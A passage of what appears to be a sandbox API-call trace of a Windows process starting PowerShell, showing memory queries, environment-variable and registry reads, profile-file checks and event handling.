	[0348.439] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.756] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.767] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.767] VirtualQuery (in: lpAddress=0x1a9f80, lpBuffer=0x1aae40, dwLength=0x30 | out: lpBuffer=0x1aae40*(BaseAddress=0x1a9000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.795] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.795] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.795] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.795] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.795] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.796] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.797] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.140] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.140] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.140] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.140] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.140] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.141] VirtualQuery (in: lpAddress=0x1ab530, lpBuffer=0x1ac3f0, dwLength=0x30 | out: lpBuffer=0x1ac3f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0349.142] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.142] CoTaskMemFree (pv=0x4684b0) 
	[0349.145] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.145] CoTaskMemFree (pv=0x4684b0) 
	[0349.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.467] VirtualQuery (in: lpAddress=0x1ab7e0, lpBuffer=0x1ac6a0, dwLength=0x30 | out: lpBuffer=0x1ac6a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.469] VirtualQuery (in: lpAddress=0x1ab7e0, lpBuffer=0x1ac6a0, dwLength=0x30 | out: lpBuffer=0x1ac6a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.469] VirtualQuery (in: lpAddress=0x1ab030, lpBuffer=0x1abef0, dwLength=0x30 | out: lpBuffer=0x1abef0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.469] VirtualQuery (in: lpAddress=0x1ab030, lpBuffer=0x1abef0, dwLength=0x30 | out: lpBuffer=0x1abef0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.470] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad638 | out: phkResult=0x1ad638*=0x364) returned 0x0
	[0349.470] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad5bc, lpData=0x0, lpcbData=0x1ad5b8*=0x0 | out: lpType=0x1ad5bc*=0x1, lpData=0x0, lpcbData=0x1ad5b8*=0x56) returned 0x0
	[0349.470] CoTaskMemAlloc (cb=0x5a) returned 0x1b814740
	[0349.470] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad58c, lpData=0x1b814740, lpcbData=0x1ad588*=0x56 | out: lpType=0x1ad58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad588*=0x56) returned 0x0
	[0349.470] CoTaskMemFree (pv=0x1b814740) 
	[0349.470] RegCloseKey (hKey=0x364) returned 0x0
	[0349.470] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad638 | out: phkResult=0x1ad638*=0x364) returned 0x0
	[0349.471] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad5bc, lpData=0x0, lpcbData=0x1ad5b8*=0x0 | out: lpType=0x1ad5bc*=0x1, lpData=0x0, lpcbData=0x1ad5b8*=0x56) returned 0x0
	[0349.471] CoTaskMemAlloc (cb=0x5a) returned 0x1b814740
	[0349.471] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad58c, lpData=0x1b814740, lpcbData=0x1ad588*=0x56 | out: lpType=0x1ad58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad588*=0x56) returned 0x0
	[0349.471] CoTaskMemFree (pv=0x1b814740) 
	[0349.471] RegCloseKey (hKey=0x364) returned 0x0
	[0349.471] CoTaskMemAlloc (cb=0x20c) returned 0x1b810970
	[0349.471] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b810970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0349.471] CoTaskMemFree (pv=0x1b810970) 
	[0349.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0349.471] CoTaskMemAlloc (cb=0x20c) returned 0x1b810970
	[0349.471] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b810970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0349.471] CoTaskMemFree (pv=0x1b810970) 
	[0349.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0349.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0349.472] SetErrorMode (uMode=0x1) returned 0x1
	[0349.472] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad5a0 | out: lpFileInformation=0x1ad5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0349.472] SetErrorMode (uMode=0x1) returned 0x1
	[0349.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0349.472] SetErrorMode (uMode=0x1) returned 0x1
	[0349.473] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad5a0 | out: lpFileInformation=0x1ad5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0349.473] SetErrorMode (uMode=0x1) returned 0x1
	[0349.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0349.473] SetErrorMode (uMode=0x1) returned 0x1
	[0349.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad5a0 | out: lpFileInformation=0x1ad5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0349.473] SetErrorMode (uMode=0x1) returned 0x1
	[0349.473] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0349.473] SetErrorMode (uMode=0x1) returned 0x1
	[0349.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad5a0 | out: lpFileInformation=0x1ad5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0349.473] SetErrorMode (uMode=0x1) returned 0x1
	[0349.474] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.474] CoTaskMemFree (pv=0x4684b0) 
	[0349.474] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.474] CoTaskMemFree (pv=0x4684b0) 
	[0349.475] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.475] CoTaskMemFree (pv=0x4684b0) 
	[0349.475] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.475] CoTaskMemFree (pv=0x4684b0) 
	[0349.476] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.477] CoTaskMemFree (pv=0x4684b0) 
	[0349.477] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x364
	[0349.477] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388
	[0349.477] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0349.477] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2d0
	[0349.477] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2f0
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x320
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0349.478] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0349.479] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.479] CoTaskMemFree (pv=0x4684b0) 
	[0349.480] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0349.480] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ad780 | out: lpMode=0x1ad780) returned 1
	[0349.481] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.481] CoTaskMemFree (pv=0x4684b0) 
	[0349.483] SetEvent (hEvent=0x2d0) returned 1
	[0349.483] SetEvent (hEvent=0x364) returned 1
	[0349.483] SetEvent (hEvent=0x388) returned 1
	[0349.483] SetEvent (hEvent=0x38c) returned 1
	[0349.483] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0349.485] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0349.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.485] CoTaskMemFree (pv=0x4684b0) 
	[0349.485] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4d8 | out: phkResult=0x1ad4d8*=0x334) returned 0x0
	[0349.485] RegQueryValueExW (in: hKey=0x334, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad45c, lpData=0x0, lpcbData=0x1ad458*=0x0 | out: lpType=0x1ad45c*=0x0, lpData=0x0, lpcbData=0x1ad458*=0x0) returned 0x2

Thread:
	id = 144
	os_tid = 0xb38


Thread:
	id = 150
	os_tid = 0x850


Thread:
	id = 185
	os_tid = 0x490


Thread:
	id = 218
	os_tid = 0xc44


Thread:
	id = 220
	os_tid = 0xc54

	[0296.126] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0337.417] LocalFree (hMem=0x3d72c0) returned 0x0
	[0337.417] RegCloseKey (hKey=0x318) returned 0x0
	[0337.417] LocalFree (hMem=0x3d7270) returned 0x0
	[0337.418] CloseHandle (hObject=0x308) returned 1
	[0337.418] CloseHandle (hObject=0x13) returned 1
	[0337.418] CloseHandle (hObject=0xf) returned 1
	[0337.419] RegCloseKey (hKey=0x2f4) returned 0x0
	[0337.419] RegCloseKey (hKey=0x2f0) returned 0x0
	[0337.419] RegCloseKey (hKey=0x2ec) returned 0x0
	[0341.936] RegCloseKey (hKey=0x31c) returned 0x0
	[0346.633] RegCloseKey (hKey=0x380) returned 0x0
	[0346.633] RegCloseKey (hKey=0x37c) returned 0x0
	[0346.634] RegCloseKey (hKey=0x378) returned 0x0
	[0346.634] RegCloseKey (hKey=0x374) returned 0x0
	[0346.634] RegCloseKey (hKey=0x370) returned 0x0
	[0346.634] RegCloseKey (hKey=0x36c) returned 0x0
	[0346.635] RegCloseKey (hKey=0x368) returned 0x0
	[0346.635] RegCloseKey (hKey=0x340) returned 0x0
	[0346.635] RegCloseKey (hKey=0x39c) returned 0x0
	[0346.635] RegCloseKey (hKey=0x398) returned 0x0
